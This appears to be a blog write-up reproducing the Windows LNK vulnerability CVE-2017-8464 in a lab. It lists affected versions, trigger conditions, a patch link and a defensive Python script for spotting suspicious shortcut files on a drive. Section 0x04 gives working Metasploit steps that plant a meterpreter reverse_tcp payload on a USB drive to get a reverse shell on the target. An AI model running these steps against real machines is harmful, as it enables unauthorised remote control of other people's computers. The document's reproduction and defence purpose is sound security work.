
Stuxnet repeat (CVE-2017-8464)

0x01 Overview

In June 2017, Microsoft posted a patch for CVE-2017-8464. This bug allows local users or remote attackers to execute arbitrary code via a crafted .LNK file, which is not properly handled during icon display in Windows Explorer or any other application that parses the icon of the shortcut. It is also known as the "LNK Remote Code Execution Vulnerability".

It is like Stuxnet, so some people call it the third generation of Stuxnet. In this article, I will reproduce CVE-2017-8464.

0x02 Affected versions

Windows 7 SP1

Windows 8

Windows 8.1

Windows RT 8.1

Windows 10 Gold, 1511, 1607, 1703

Windows Server 2008 SP2 and R2 SP1

Windows Server 2012 Gold and R2

Windows Server 2016

0x03 Trigger conditions

1. AutoPlay is enabled (It worked!)

2. Browse the directory (It worked!)

3. Access the file directory through a network share (I did not test this)

0x04 Reproducing the bug

Environment:

Target: Win7 (32-bit)

Attacker: Kali

Tools: MSF, USB drive

Step 1:

Download the latest Metasploit, then copy modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb to /usr/share/metasploit-framework/modules/exploits/windows/fileformat.

And copy data/exploits/cve-2017-8464 to /usr/share/metasploit-framework/data/exploits.

Step 2:

msfconsole

use exploit/windows/fileformat/cve_2017_8464_lnk_rce

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST your ip

exploit

Step 3:
cp -r /root/.msf4/local/ /root/cve-2017-8464-lnk

Step 4:
Copy all 24 files to the root folder of the target USB drive.

Step 5:
use multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST your ip

run

Step 6:
Insert the USB drive into the target computer, and you will get a reverse shell.

PS: the .cpl file must be in the root folder of the target USB drive!
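
The layout above (shortcut files sitting next to a .cpl in the drive root) is something a defender can check for before a drive is browsed in Explorer. The following triage sketch is an added example, not part of the original post or of Metasploit: it lists the .lnk files in a directory that have a genuine Shell Link header and contain the name of a .cpl file stored in the same directory. That the shortcut's bytes contain the .cpl file name is a heuristic assumption, and the function names and sample files are constructed for illustration.

```python
import os
import struct
import tempfile

# Shell Link header (MS-SHLLINK): HeaderSize 0x4C, then the LinkCLSID
# 00021401-0000-0000-C000-000000000046 in its on-disk byte order.
LNK_MAGIC = struct.pack("<I", 0x4C) + bytes.fromhex("0114020000000000c000000000000046")

def is_shell_link(data):
    return len(data) >= 0x4C and data.startswith(LNK_MAGIC)

def names_file(data, name):
    """True if the shortcut's bytes contain `name` as UTF-16LE or ANSI text."""
    low, n = data.lower(), name.lower()
    return n.encode("utf-16-le") in low or (n.isascii() and n.encode("ascii") in low)

def lnks_naming_root_cpl(root):
    """Map each real .lnk in `root` to the .cpl files in `root` that it names."""
    files = [e for e in os.scandir(root) if e.is_file()]
    cpls = [e.name for e in files if e.name.lower().endswith(".cpl")]
    hits = {}
    for e in files:
        if not e.name.lower().endswith(".lnk"):
            continue
        with open(e.path, "rb") as fh:
            data = fh.read(1 << 20)  # shortcuts are small; cap the read
        named = [c for c in cpls if is_shell_link(data) and names_file(data, c)]
        if named:
            hits[e.name] = sorted(named)
    return hits

def build_sample_root():
    """Constructed stand-in for a drive root: inert bytes, no working shortcut."""
    root = tempfile.mkdtemp(prefix="usbroot_")
    header = LNK_MAGIC + bytes(0x4C - len(LNK_MAGIC))
    samples = {
        "sample.cpl": b"not a real control panel item",
        "flagged.lnk": header + "E:\\sample.cpl".encode("utf-16-le"),
        "benign.lnk": header + "C:\\Windows\\notepad.exe".encode("utf-16-le"),
        "renamed.lnk": b"plain text, not a shell link" + b"sample.cpl",
    }
    for name, body in samples.items():
        with open(os.path.join(root, name), "wb") as fh:
            fh.write(body)
    return root

if __name__ == "__main__":
    print(lnks_naming_root_cpl(build_sample_root()))
```

Run it against a mounted drive or image from a system that does not render shortcut icons for that path; a hit is a reason to inspect the files, not proof of exploitation.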

0x05 Fix

Get the patch from MS:

https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-8464

0x06 Conclusion

I think this bug is so cool; it is like Stuxnet, powerful and easy to use, so get the patch as fast as possible.


 
